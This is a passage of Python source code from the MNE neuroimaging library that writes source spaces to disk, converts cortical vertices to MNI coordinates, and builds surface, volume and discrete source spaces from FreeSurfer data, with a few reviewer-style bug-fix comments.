    write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, this['coord_frame'])

    write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS, this['np'])
    write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS, this['rr'])
    write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS, this['nn'])

    # Which vertices are active
    write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION, this['inuse'])
    write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE, this['nuse'])

    if this['ntri'] > 0:
        write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI, this['ntri'])
        # FIF stores 1-based triangle indices
        write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES,
                         this['tris'] + 1)

    if this['type'] != 'vol' and this['use_tris'] is not None:
        # Use triangulation
        write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI, this['nuse_tri'])
        write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES,
                         this['use_tris'] + 1)

    if this['type'] == 'vol':
        # neighbor lists are flattened; counts allow splitting on read
        neighbor_vert = this.get('neighbor_vert', None)
        if neighbor_vert is not None:
            nneighbors = np.array([len(n) for n in neighbor_vert])
            neighbors = np.concatenate(neighbor_vert)
            write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS, nneighbors)
            write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS, neighbors)

        write_coord_trans(fid, this['src_mri_t'])

        write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS, this['shape'])

        start_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
        write_coord_trans(fid, this['mri_ras_t'])
        write_coord_trans(fid, this['vox_mri_t'])

        mri_volume_name = this.get('mri_volume_name', None)
        if mri_volume_name is not None:
            write_string(fid, FIFF.FIFF_MNE_FILE_NAME, mri_volume_name)

        write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR,
                               this['interpolator'])

        if 'mri_file' in this and this['mri_file'] is not None:
            write_string(fid, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE,
                         this['mri_file'])

        write_int(fid, FIFF.FIFF_MRI_WIDTH, this['mri_width'])
        write_int(fid, FIFF.FIFF_MRI_HEIGHT, this['mri_height'])
        write_int(fid, FIFF.FIFF_MRI_DEPTH, this['mri_depth'])

        end_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)

    # Patch-related information
    if this['nearest'] is not None:
        write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST, this['nearest'])
        write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST,
                           this['nearest_dist'])

    # Distances
    if this['dist'] is not None:
        # Save only upper triangular portion of the matrix
        dists = this['dist'].copy()
        dists = sparse.triu(dists, format=dists.format)
        write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST, dists)
        write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT,
                           this['dist_limit'])

    # Segmentation data
    if this['type'] == 'vol' and ('seg_name' in this):
        # Save the name of the segment
        write_string(fid, FIFF.FIFF_COMMENT, this['seg_name'])
##############################################################################
# Surface to MNI conversion
@verbose
def vertex_to_mni(vertices, hemis, subject, subjects_dir=None, mode=None,
                  verbose=None):
    """Convert the array of vertices for a hemisphere to MNI coordinates.

    Parameters
    ----------
    vertices : int, or list of int
        Vertex number(s) to convert.
    hemis : int, or list of int
        Hemisphere(s) the vertices belong to.
    subject : string
        Name of the subject to load surfaces from.
    subjects_dir : string, or None
        Path to SUBJECTS_DIR if it is not set in the environment.
    mode : string | None
        Either 'nibabel' or 'freesurfer' for the software to use to
        obtain the transforms. If None, 'nibabel' is tried first, falling
        back to 'freesurfer' if it fails. Results should be equivalent with
        either option, but nibabel may be quicker (and more pythonic).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    coordinates : n_vertices x 3 array of float
        The MNI coordinates (in mm) of the vertices.

    Notes
    -----
    This function requires either nibabel (in Python) or Freesurfer
    (with utility "mri_info") to be correctly installed.
    """
    if not has_freesurfer() and not has_nibabel():
        raise RuntimeError('NiBabel (Python) or Freesurfer (Unix) must be '
                           'correctly installed and accessible from Python')

    # promote scalars to sequences (idiom: single isinstance with a tuple)
    if not isinstance(vertices, (list, np.ndarray)):
        vertices = [vertices]

    if not isinstance(hemis, (list, np.ndarray)):
        hemis = [hemis] * len(vertices)

    if len(hemis) != len(vertices):
        raise ValueError('hemi and vertices must match in length')

    subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)

    surfs = [op.join(subjects_dir, subject, 'surf', '%s.white' % h)
             for h in ['lh', 'rh']]

    # read surface locations in MRI space
    rr = [read_surface(s)[0] for s in surfs]

    # take point locations in MRI space and convert to MNI coordinates
    xfm = _read_talxfm(subject, subjects_dir, mode)
    data = np.array([rr[h][v, :] for h, v in zip(hemis, vertices)])
    return apply_trans(xfm['trans'], data)
@verbose
def _read_talxfm(subject, subjects_dir, mode=None, verbose=None):
    """Read MNI transform from FreeSurfer talairach.xfm file.

    Adapted from freesurfer m-files. Altered to deal with Norig
    and Torig correctly.

    Builds the MRI -> MNI Talairach transform by combining the RAS -> MNI
    matrix from talairach.xfm with the Norig/Torig (vox->ras, vox->mri)
    transforms of the subject's orig/T1 mgz volume.
    """
    if mode is not None and mode not in ['nibabel', 'freesurfer']:
        raise ValueError('mode must be "nibabel" or "freesurfer"')
    fname = op.join(subjects_dir, subject, 'mri', 'transforms',
                    'talairach.xfm')
    # read the RAS to MNI transform from talairach.xfm
    with open(fname, 'r') as fid:
        logger.debug('Reading FreeSurfer talairach.xfm file:\n%s' % fname)

        # read lines until we get the string 'Linear_Transform', which precedes
        # the data transformation matrix
        got_it = False
        comp = 'Linear_Transform'
        for line in fid:
            if line[:len(comp)] == comp:
                # we have the right line, so don't read any more
                got_it = True
                break

        if got_it:
            xfm = list()
            # read the transformation matrix (3x4)
            for ii, line in enumerate(fid):
                digs = [float(s) for s in line.strip('\n;').split()]
                xfm.append(digs)
                if ii == 2:
                    break
            # append a homogeneous row to make it 4x4
            xfm.append([0., 0., 0., 1.])
            xfm = np.array(xfm, dtype=float)
        else:
            raise ValueError('failed to find \'Linear_Transform\' string in '
                             'xfm file:\n%s' % fname)

    # Setup the RAS to MNI transform
    ras_mni_t = {'from': FIFF.FIFFV_MNE_COORD_RAS,
                 'to': FIFF.FIFFV_MNE_COORD_MNI_TAL, 'trans': xfm}

    # now get Norig and Torig
    # (i.e. vox_ras_t and vox_mri_t, respectively)
    path = op.join(subjects_dir, subject, 'mri', 'orig.mgz')
    if not op.isfile(path):
        # fall back to T1.mgz when orig.mgz is absent
        path = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
        if not op.isfile(path):
            raise IOError('mri not found: %s' % path)

    if has_nibabel():
        use_nibabel = True
    else:
        use_nibabel = False
        if mode == 'nibabel':
            raise ImportError('Tried to import nibabel but failed, try using '
                              'mode=None or mode=Freesurfer')

    # note that if mode == None, then we default to using nibabel
    if use_nibabel is True and mode == 'freesurfer':
        use_nibabel = False
    if use_nibabel:
        import nibabel as nib
        img = nib.load(path)
        hdr = img.get_header()
        # read the MRI_VOXEL to RAS transform
        n_orig = hdr.get_vox2ras()
        # read the MRI_VOXEL to MRI transform
        ds = np.array(hdr.get_zooms())
        ns = (np.array(hdr.get_data_shape()[:3]) * ds) / 2.0
        t_orig = np.array([[-ds[0], 0, 0, ns[0]],
                           [0, 0, ds[2], -ns[2]],
                           [0, -ds[1], 0, ns[1]],
                           [0, 0, 0, 1]], dtype=float)
        nt_orig = [n_orig, t_orig]
    else:
        # shell out to FreeSurfer's mri_info for the two 4x4 matrices
        nt_orig = list()
        for conv in ['--vox2ras', '--vox2ras-tkr']:
            stdout, stderr = run_subprocess(['mri_info', conv, path])
            stdout = np.fromstring(stdout, sep=' ').astype(float)
            if not stdout.size == 16:
                raise ValueError('Could not parse Freesurfer mri_info output')
            nt_orig.append(stdout.reshape(4, 4))
    # extract the MRI_VOXEL to RAS transform
    n_orig = nt_orig[0]
    # NOTE(review): vox_ras_t is a plain dict while vox_mri_t below uses
    # Transform -- presumably both are accepted downstream; consider
    # unifying.
    vox_ras_t = {'from': FIFF.FIFFV_MNE_COORD_MRI_VOXEL,
                 'to': FIFF.FIFFV_MNE_COORD_RAS,
                 'trans': n_orig}

    # extract the MRI_VOXEL to MRI transform
    t_orig = nt_orig[1]
    vox_mri_t = Transform('mri_voxel', 'mri', t_orig)

    # invert MRI_VOXEL to MRI to get the MRI to MRI_VOXEL transform
    mri_vox_t = invert_transform(vox_mri_t)

    # construct an MRI to RAS transform
    mri_ras_t = combine_transforms(mri_vox_t, vox_ras_t, 'mri', 'ras')

    # construct the MRI to MNI transform
    mri_mni_t = combine_transforms(mri_ras_t, ras_mni_t, 'mri', 'mni_tal')
    return mri_mni_t
###############################################################################
# Creation and decimation
@verbose
def setup_source_space(subject, fname=True, spacing='oct6', surface='white',
                       overwrite=False, subjects_dir=None, add_dist=True,
                       n_jobs=1, verbose=None):
    """Setup a source space with subsampling
    Parameters
    ----------
    subject : str
        Subject to process.
    fname : str | None | bool
        Filename to use. If True, a default name will be used. If None,
        the source space will not be saved (only returned).
    spacing : str
        The spacing to use. Can be ``'ico#'`` for a recursively subdivided
        icosahedron, ``'oct#'`` for a recursively subdivided octahedron,
        or ``'all'`` for all points.
    surface : str
        The surface to use.
    overwrite: bool
        If True, overwrite output file (if it exists).
    subjects_dir : string, or None
        Path to SUBJECTS_DIR if it is not set in the environment.
    add_dist : bool
        Add distance and patch information to the source space. This takes some
        time so precomputing it is recommended.
    n_jobs : int
        Number of jobs to run in parallel. Will use at most 2 jobs
        (one for each hemisphere).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    Returns
    -------
    src : list
        The source space for each hemisphere.
    """
    # record the invocation so it can be stored with the source space
    cmd = ('setup_source_space(%s, fname=%s, spacing=%s, surface=%s, '
           'overwrite=%s, subjects_dir=%s, add_dist=%s, verbose=%s)'
           % (subject, fname, spacing, surface, overwrite,
              subjects_dir, add_dist, verbose))
    # check to make sure our parameters are good, parse 'spacing'
    space_err = ('"spacing" must be a string with values '
                 '"ico#", "oct#", or "all", and "ico" and "oct"'
                 'numbers must be integers')
    if not isinstance(spacing, string_types) or len(spacing) < 3:
        raise ValueError(space_err)
    if spacing == 'all':
        stype = 'all'
        sval = ''
    elif spacing[:3] == 'ico':
        stype = 'ico'
        sval = spacing[3:]
    elif spacing[:3] == 'oct':
        stype = 'oct'
        sval = spacing[3:]
    else:
        raise ValueError(space_err)
    if stype in ('ico', 'oct'):
        # The subdivision grade must parse as an integer. The exception was
        # narrowed from a bare "except:", and an unreachable
        # "elif stype == 'spacing'" branch was removed (stype can only be
        # 'all', 'ico', or 'oct' at this point).
        try:
            sval = int(sval)
        except ValueError:
            raise ValueError(space_err)
    subjects_dir = get_subjects_dir(subjects_dir)
    surfs = [op.join(subjects_dir, subject, 'surf', hemi + surface)
             for hemi in ['lh.', 'rh.']]
    bem_dir = op.join(subjects_dir, subject, 'bem')
    for surf, hemi in zip(surfs, ['LH', 'RH']):
        if surf is not None and not op.isfile(surf):
            raise IOError('Could not find the %s surface %s'
                          % (hemi, surf))
    if not (fname is True or fname is None or isinstance(fname, string_types)):
        raise ValueError('"fname" must be a string, True, or None')
    if fname is True:
        extra = '%s-%s' % (stype, sval) if sval != '' else stype
        fname = op.join(bem_dir, '%s-%s-src.fif' % (subject, extra))
    if fname is not None and op.isfile(fname) and overwrite is False:
        raise IOError('file "%s" exists, use overwrite=True if you want '
                      'to overwrite the file' % fname)
    logger.info('Setting up the source space with the following parameters:\n')
    logger.info('SUBJECTS_DIR = %s' % subjects_dir)
    logger.info('Subject = %s' % subject)
    logger.info('Surface = %s' % surface)
    if stype == 'ico':
        src_type_str = 'ico = %s' % sval
        logger.info('Icosahedron subdivision grade %s\n' % sval)
    elif stype == 'oct':
        src_type_str = 'oct = %s' % sval
        logger.info('Octahedron subdivision grade %s\n' % sval)
    else:
        src_type_str = 'all'
        logger.info('Include all vertices\n')
    # Create the fif file
    if fname is not None:
        logger.info('>>> 1. Creating the source space file %s...' % fname)
    else:
        logger.info('>>> 1. Creating the source space...\n')
    # mne_make_source_space ... actually make the source spaces
    src = []
    # pre-load ico/oct surf (once) for speed, if necessary
    if stype in ['ico', 'oct']:
        # ### from mne_ico_downsample.c ###
        if stype == 'ico':
            logger.info('Doing the icosahedral vertex picking...')
            ico_surf = _get_ico_surface(sval)
        else:
            logger.info('Doing the octahedral vertex picking...')
            ico_surf = _tessellate_sphere_surf(sval)
    else:
        ico_surf = None
    for hemi, surf in zip(['lh', 'rh'], surfs):
        logger.info('Loading %s...' % surf)
        # Setup the surface spacing in the MRI coord frame
        s = _create_surf_spacing(surf, hemi, subject, stype, sval, ico_surf,
                                 subjects_dir)
        logger.info('loaded %s %d/%d selected to source space (%s)'
                    % (op.split(surf)[1], s['nuse'], s['np'], src_type_str))
        src.append(s)
        logger.info('')  # newline after both subject types are run
    # Fill in source space info
    hemi_ids = [FIFF.FIFFV_MNE_SURF_LEFT_HEMI, FIFF.FIFFV_MNE_SURF_RIGHT_HEMI]
    for s, s_id in zip(src, hemi_ids):
        # Add missing fields
        s.update(dict(dist=None, dist_limit=None, nearest=None, type='surf',
                      nearest_dist=None, pinfo=None, patch_inds=None, id=s_id,
                      coord_frame=np.array((FIFF.FIFFV_COORD_MRI,), np.int32)))
        s['rr'] /= 1000.0  # surface positions are in mm; store in meters
        del s['tri_area']
        del s['tri_cent']
        del s['tri_nn']
        del s['neighbor_tri']
    # upconvert to object format from lists
    src = SourceSpaces(src, dict(working_dir=os.getcwd(), command_line=cmd))
    if add_dist:
        add_source_space_distances(src, n_jobs=n_jobs, verbose=verbose)
    # write out if requested, then return the data
    if fname is not None:
        write_source_spaces(fname, src)
        logger.info('Wrote %s' % fname)
    logger.info('You are now one step closer to computing the gain matrix')
    return src
@verbose
def setup_volume_source_space(subject, fname=None, pos=5.0, mri=None,
                              sphere=(0.0, 0.0, 0.0, 90.0), bem=None,
                              surface=None, mindist=5.0, exclude=0.0,
                              overwrite=False, subjects_dir=None,
                              volume_label=None, add_interpolator=True,
                              verbose=None):
    """Setup a volume source space with grid spacing or discrete source space
    Parameters
    ----------
    subject : str
        Subject to process.
    fname : str | None
        Filename to use. If None, the source space will not be saved
        (only returned).
    pos : float | dict
        Positions to use for sources. If float, a grid will be constructed
        with the spacing given by `pos` in mm, generating a volume source
        space. If dict, pos['rr'] and pos['nn'] will be used as the source
        space locations (in meters) and normals, respectively, creating a
        discrete source space. NOTE: For a discrete source space (`pos` is
        a dict), `mri` must be None.
    mri : str | None
        The filename of an MRI volume (mgh or mgz) to create the
        interpolation matrix over. Source estimates obtained in the
        volume source space can then be morphed onto the MRI volume
        using this interpolator. If pos is a dict, this can be None.
    sphere : array_like (length 4)
        Define spherical source space bounds using origin and radius given
        by (ox, oy, oz, rad) in mm. Only used if `bem` and `surface` are
        both None.
    bem : str | None
        Define source space bounds using a BEM file (specifically the inner
        skull surface).
    surface : str | dict | None
        Define source space bounds using a FreeSurfer surface file. Can
        also be a dictionary with entries `'rr'` and `'tris'`, such as
        those returned by `read_surface()`.
    mindist : float
        Exclude points closer than this distance (mm) to the bounding surface.
    exclude : float
        Exclude points closer than this distance (mm) from the center of mass
        of the bounding surface.
    overwrite: bool
        If True, overwrite output file (if it exists).
    subjects_dir : string, or None
        Path to SUBJECTS_DIR if it is not set in the environment.
    volume_label : str | None
        Region of interest corresponding with freesurfer lookup table.
    add_interpolator : bool
        If True and ``mri`` is not None, then an interpolation matrix
        will be produced.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    Returns
    -------
    src : list
        The source space. Note that this list will have length 1 for
        compatibility reasons, as most functions expect source spaces
        to be provided as lists).
    Notes
    -----
    To create a discrete source space, `pos` must be a dict, 'mri' must be
    None, and 'volume_label' must be None. To create a whole brain volume
    source space, `pos` must be a float and 'mri' must be provided. To create
    a volume source space from label, 'pos' must be a float, 'volume_label'
    must be provided, and 'mri' must refer to a .mgh or .mgz file with values
    corresponding to the freesurfer lookup-table (typically aseg.mgz).
    """
    subjects_dir = get_subjects_dir(subjects_dir)
    # mutually-exclusive / dependent argument checks
    if bem is not None and surface is not None:
        raise ValueError('Only one of "bem" and "surface" should be '
                         'specified')
    if mri is not None:
        if not op.isfile(mri):
            raise IOError('mri file "%s" not found' % mri)
        if isinstance(pos, dict):
            raise ValueError('Cannot create interpolation matrix for '
                             'discrete source space, mri must be None if '
                             'pos is a dict')
    if volume_label is not None:
        if mri is None:
            raise RuntimeError('"mri" must be provided if "volume_label" is '
                               'not None')
        # Check that volume label is found in .mgz file
        volume_labels = get_volume_labels_from_aseg(mri)
        if volume_label not in volume_labels:
            raise ValueError('Volume %s not found in file %s. Double check '
                             'freesurfer lookup table.' % (volume_label, mri))
    sphere = np.asarray(sphere)
    if sphere.size != 4:
        raise ValueError('"sphere" must be array_like with 4 elements')
    # triage bounding argument
    if bem is not None:
        logger.info('BEM file : %s', bem)
    elif surface is not None:
        if isinstance(surface, dict):
            if not all(key in surface for key in ['rr', 'tris']):
                raise KeyError('surface, if dict, must have entries "rr" '
                               'and "tris"')
            # let's make sure we have geom info
            surface = _read_surface_geom(surface, verbose=False)
            surf_extra = 'dict()'
        elif isinstance(surface, string_types):
            if not op.isfile(surface):
                raise IOError('surface file "%s" not found' % surface)
            surf_extra = surface
        logger.info('Boundary surface file : %s', surf_extra)
    else:
        logger.info('Sphere : origin at (%.1f %.1f %.1f) mm'
                    % (sphere[0], sphere[1], sphere[2]))
        logger.info(' radius : %.1f mm' % sphere[3])
    # triage pos argument
    if isinstance(pos, dict):
        if not all(key in pos for key in ['rr', 'nn']):
            raise KeyError('pos, if dict, must contain "rr" and "nn"')
        pos_extra = 'dict()'
    else:  # pos should be float-like
        try:
            pos = float(pos)
        except (TypeError, ValueError):
            raise ValueError('pos must be a dict, or something that can be '
                             'cast to float()')
    if not isinstance(pos, float):
        logger.info('Source location file : %s', pos_extra)
        logger.info('Assuming input in millimeters')
        logger.info('Assuming input in MRI coordinates')
    logger.info('Output file : %s', fname)
    if isinstance(pos, float):
        logger.info('grid : %.1f mm' % pos)
        logger.info('mindist : %.1f mm' % mindist)
        pos /= 1000.0  # convert pos from mm to m
    if exclude > 0.0:
        logger.info('Exclude : %.1f mm' % exclude)
    if mri is not None:
        logger.info('MRI volume : %s' % mri)
    exclude /= 1000.0  # convert exclude from mm to m
    logger.info('')
    # Explicit list of points
    if not isinstance(pos, float):
        # Make the grid of sources
        sp = _make_discrete_source_space(pos)
    else:
        # Load the brain surface as a template
        if bem is not None:
            # read bem surface in the MRI coordinate frame
            surf = read_bem_surfaces(bem, s_id=FIFF.FIFFV_BEM_SURF_ID_BRAIN,
                                     verbose=False)
            logger.info('Loaded inner skull from %s (%d nodes)'
                        % (bem, surf['np']))
        elif surface is not None:
            if isinstance(surface, string_types):
                # read the surface in the MRI coordinate frame
                surf = _read_surface_geom(surface)
            else:
                surf = surface
            logger.info('Loaded bounding surface from %s (%d nodes)'
                        % (surface, surf['np']))
            surf = deepcopy(surf)
            surf['rr'] *= 1e-3  # must be converted to meters
        else:  # Load an icosahedron and use that as the surface
            logger.info('Setting up the sphere...')
            surf = _get_ico_surface(3)
            # Scale and shift
            # center at origin and make radius 1
            _normalize_vectors(surf['rr'])
            # normalize to sphere (in MRI coord frame)
            surf['rr'] *= sphere[3] / 1000.0  # scale by radius
            surf['rr'] += sphere[:3] / 1000.0  # move by center
            _complete_surface_info(surf, True)
        # Make the grid of sources in MRI space
        sp = _make_volume_source_space(surf, pos, exclude, mindist, mri,
                                       volume_label)
    # Compute an interpolation matrix to show data in MRI_VOXEL coord frame
    if mri is not None:
        _add_interpolator(sp, mri, add_interpolator)
    elif sp['type'] == 'vol':
        # If there is no interpolator, it's actually a discrete source space
        sp['type'] = 'discrete'
    if 'vol_dims' in sp:
        del sp['vol_dims']
    # Save it
    sp.update(dict(nearest=None, dist=None, use_tris=None, patch_inds=None,
                   dist_limit=None, pinfo=None, ntri=0, nearest_dist=None,
                   nuse_tri=0, tris=None))
    sp = SourceSpaces([sp], dict(working_dir=os.getcwd(), command_line='None'))
    if fname is not None:
        write_source_spaces(fname, sp, verbose=False)
    return sp
def _make_voxel_ras_trans(move, ras, voxel_size):
    """Make a transformation from MRI_VOXEL to MRI surface RAS (i.e. MRI)"""
    assert voxel_size.ndim == 1 and voxel_size.size == 3
    # scale the direction-cosine rows by the voxel dimensions
    rot = ras.T * voxel_size[np.newaxis, :]
    assert rot.ndim == 2
    assert rot.shape == (3, 3)
    # assemble the 4x4 affine: rotation/scale block, translation column,
    # and the homogeneous bottom row [0, 0, 0, 1]
    trans = np.empty((4, 4))
    trans[:3, :3] = rot
    trans[:3, 3] = move
    trans[3, :3] = 0.0
    trans[3, 3] = 1.0
    return Transform('mri_voxel', 'mri', trans)
def _make_discrete_source_space(pos):
    """Use a discrete set of source locs/oris to make src space
    Parameters
    ----------
    pos : dict
        Must have entries "rr" and "nn". Data should be in meters.
    Returns
    -------
    src : dict
        The source space.
    """
    # process points
    rr = pos['rr'].copy()
    nn = pos['nn'].copy()
    # BUG FIX: the original compared nn.shape[0] with itself (always True),
    # so rr/nn row-count mismatches slipped through. Also enforce the
    # 3 columns promised by the error message.
    if not (rr.ndim == nn.ndim == 2 and rr.shape[0] == nn.shape[0] and
            rr.shape[1] == nn.shape[1] == 3):
        raise RuntimeError('"rr" and "nn" must both be 2D arrays with '
                           'the same number of rows and 3 columns')
    npts = rr.shape[0]
    _normalize_vectors(nn)
    # zero-length normals presumably survive normalization as zeros, making
    # them detectable here -- TODO confirm against _normalize_vectors
    nz = np.sum(np.sum(nn * nn, axis=1) == 0)
    if nz != 0:
        raise RuntimeError('%d sources have zero length normal' % nz)
    logger.info('Positions (in meters) and orientations')
    logger.info('%d sources' % npts)
    # Ready to make the source space
    coord_frame = FIFF.FIFFV_COORD_MRI
    sp = dict(coord_frame=coord_frame, type='discrete', nuse=npts, np=npts,
              inuse=np.ones(npts, int), vertno=np.arange(npts), rr=rr, nn=nn,
              id=-1)
    return sp
def _make_volume_source_space(surf, grid, exclude, mindist, mri=None,
                              volume_label=None, do_neighbors=True, n_jobs=1):
    """Make a source space which covers the volume bounded by surf

    Parameters
    ----------
    surf : dict
        Bounding surface; 'rr' is used in meters.
    grid : float
        Grid spacing in meters.
    exclude : float
        Exclude points closer than this (meters) to the surface center
        of mass.
    mindist : float
        Exclude points closer than this (mm) to the bounding surface.
    mri : str | None
        Segmentation volume used when restricting to ``volume_label``.
    volume_label : str | None
        FreeSurfer label to restrict the grid to (requires do_neighbors).
    do_neighbors : bool
        If True, compute the 26-neighborhood info for each grid point.
    n_jobs : int
        Number of jobs for the inside-surface check.

    Returns
    -------
    sp : dict
        The volume source space.
    """
    # Figure out the grid size in the MRI coordinate frame
    mins = np.min(surf['rr'], axis=0)
    maxs = np.max(surf['rr'], axis=0)
    cm = np.mean(surf['rr'], axis=0)  # center of mass
    # Define the sphere which fits the surface
    maxdist = np.sqrt(np.max(np.sum((surf['rr'] - cm) ** 2, axis=1)))
    logger.info('Surface CM = (%6.1f %6.1f %6.1f) mm'
                % (1000 * cm[0], 1000 * cm[1], 1000 * cm[2]))
    logger.info('Surface fits inside a sphere with radius %6.1f mm'
                % (1000 * maxdist))
    logger.info('Surface extent:')
    for c, mi, ma in zip('xyz', mins, maxs):
        logger.info(' %s = %6.1f ... %6.1f mm' % (c, 1000 * mi, 1000 * ma))
    # round the bounding box outward to whole grid steps
    maxn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
                     np.floor(np.abs(m) / grid) - 1 for m in maxs], int)
    minn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
                     np.floor(np.abs(m) / grid) - 1 for m in mins], int)
    logger.info('Grid extent:')
    for c, mi, ma in zip('xyz', minn, maxn):
        logger.info(' %s = %6.1f ... %6.1f mm'
                    % (c, 1000 * mi * grid, 1000 * ma * grid))
    # Now make the initial grid
    ns = maxn - minn + 1
    npts = np.prod(ns)
    nrow = ns[0]
    ncol = ns[1]
    nplane = nrow * ncol
    # x varies fastest, then y, then z (can use unravel to do this)
    rr = meshgrid(np.arange(minn[2], maxn[2] + 1),
                  np.arange(minn[1], maxn[1] + 1),
                  np.arange(minn[0], maxn[0] + 1), indexing='ij')
    x, y, z = rr[2].ravel(), rr[1].ravel(), rr[0].ravel()
    rr = np.array([x * grid, y * grid, z * grid]).T
    sp = dict(np=npts, nn=np.zeros((npts, 3)), rr=rr,
              inuse=np.ones(npts, int), type='vol', nuse=npts,
              coord_frame=FIFF.FIFFV_COORD_MRI, id=-1, shape=ns)
    sp['nn'][:, 2] = 1.0  # dummy normals pointing in +z
    assert sp['rr'].shape[0] == npts
    logger.info('%d sources before omitting any.', sp['nuse'])
    # Exclude infeasible points
    dists = np.sqrt(np.sum((sp['rr'] - cm) ** 2, axis=1))
    bads = np.where(np.logical_or(dists < exclude, dists > maxdist))[0]
    sp['inuse'][bads] = False
    sp['nuse'] -= len(bads)
    logger.info('%d sources after omitting infeasible sources.', sp['nuse'])
    _filter_source_spaces(surf, mindist, None, [sp], n_jobs)
    logger.info('%d sources remaining after excluding the sources outside '
                'the surface and less than %6.1f mm inside.'
                % (sp['nuse'], mindist))
    if not do_neighbors:
        if volume_label is not None:
            raise RuntimeError('volume_label cannot be None unless '
                               'do_neighbors is True')
        return sp
    k = np.arange(npts)
    neigh = np.empty((26, npts), int)
    neigh.fill(-1)
    # Figure out each neighborhood:
    # 6-neighborhood first
    idxs = [z > minn[2], x < maxn[0], y < maxn[1],
            x > minn[0], y > minn[1], z < maxn[2]]
    offsets = [-nplane, 1, nrow, -1, -nrow, nplane]
    for n, idx, offset in zip(neigh[:6], idxs, offsets):
        n[idx] = k[idx] + offset
    # Then the rest to complete the 26-neighborhood
    # First the plane below
    idx1 = z > minn[2]
    idx2 = np.logical_and(idx1, x < maxn[0])
    neigh[6, idx2] = k[idx2] + 1 - nplane
    idx3 = np.logical_and(idx2, y < maxn[1])
    neigh[7, idx3] = k[idx3] + 1 + nrow - nplane
    idx2 = np.logical_and(idx1, y < maxn[1])
    neigh[8, idx2] = k[idx2] + nrow - nplane
    idx2 = np.logical_and(idx1, x > minn[0])
    idx3 = np.logical_and(idx2, y < maxn[1])
    neigh[9, idx3] = k[idx3] - 1 + nrow - nplane
    neigh[10, idx2] = k[idx2] - 1 - nplane
    idx3 = np.logical_and(idx2, y > minn[1])
    neigh[11, idx3] = k[idx3] - 1 - nrow - nplane
    idx2 = np.logical_and(idx1, y > minn[1])
    neigh[12, idx2] = k[idx2] - nrow - nplane
    idx3 = np.logical_and(idx2, x < maxn[0])
    neigh[13, idx3] = k[idx3] + 1 - nrow - nplane
    # Then the same plane
    idx1 = np.logical_and(x < maxn[0], y < maxn[1])
    neigh[14, idx1] = k[idx1] + 1 + nrow
    idx1 = x > minn[0]
    idx2 = np.logical_and(idx1, y < maxn[1])
    neigh[15, idx2] = k[idx2] - 1 + nrow
    idx2 = np.logical_and(idx1, y > minn[1])
    neigh[16, idx2] = k[idx2] - 1 - nrow
    idx1 = np.logical_and(y > minn[1], x < maxn[0])
    # BUG FIX: this is the (+x, -y) neighbor in the *same* plane, so no
    # nplane offset belongs here; the original "- nplane" duplicated
    # neighbor 13 and pointed below the grid for bottom-plane voxels
    neigh[17, idx1] = k[idx1] + 1 - nrow
    # Finally one plane above
    idx1 = z < maxn[2]
    idx2 = np.logical_and(idx1, x < maxn[0])
    neigh[18, idx2] = k[idx2] + 1 + nplane
    idx3 = np.logical_and(idx2, y < maxn[1])
    neigh[19, idx3] = k[idx3] + 1 + nrow + nplane
    idx2 = np.logical_and(idx1, y < maxn[1])
    neigh[20, idx2] = k[idx2] + nrow + nplane
    idx2 = np.logical_and(idx1, x > minn[0])
    idx3 = np.logical_and(idx2, y < maxn[1])
    neigh[21, idx3] = k[idx3] - 1 + nrow + nplane
    neigh[22, idx2] = k[idx2] - 1 + nplane
    idx3 = np.logical_and(idx2, y > minn[1])
    neigh[23, idx3] = k[idx3] - 1 - nrow + nplane
    idx2 = np.logical_and(idx1, y > minn[1])
    neigh[24, idx2] = k[idx2] - nrow + nplane
    idx3 = np.logical_and(idx2, x < maxn[0])
    neigh[25, idx3] = k[idx3] + 1 - nrow + nplane
    # Restrict sources to volume of interest
    if volume_label is not None:
        try:
            import nibabel as nib
        except ImportError:
            raise ImportError("nibabel is required to read segmentation file.")
        logger.info('Selecting voxels from %s' % volume_label)
        # Read the segmentation data using nibabel
        mgz = nib.load(mri)
        mgz_data = mgz.get_data()
        # Get the numeric index for this volume label
        lut = _get_lut()
        vol_id = _get_lut_id(lut, volume_label, True)
        # Get indices for this volume label in voxel space
        vox_bool = mgz_data == vol_id
        # Get the 3 dimensional indices in voxel space
        vox_xyz = np.array(np.where(vox_bool)).T
        # Transform to RAS coordinates
        # (use tkr normalization or volume won't align with surface sources)
        trans = _get_mgz_header(mri)['vox2ras_tkr']
        # Convert transform from mm to m
        trans[:3] /= 1000.
        rr_voi = apply_trans(trans, vox_xyz)  # positions of VOI in RAS space
        # Filter out points too far from volume region voxels
        dists = _compute_nearest(rr_voi, sp['rr'], return_dists=True)[1]
        # Maximum distance from center of mass of a voxel to any of its corners
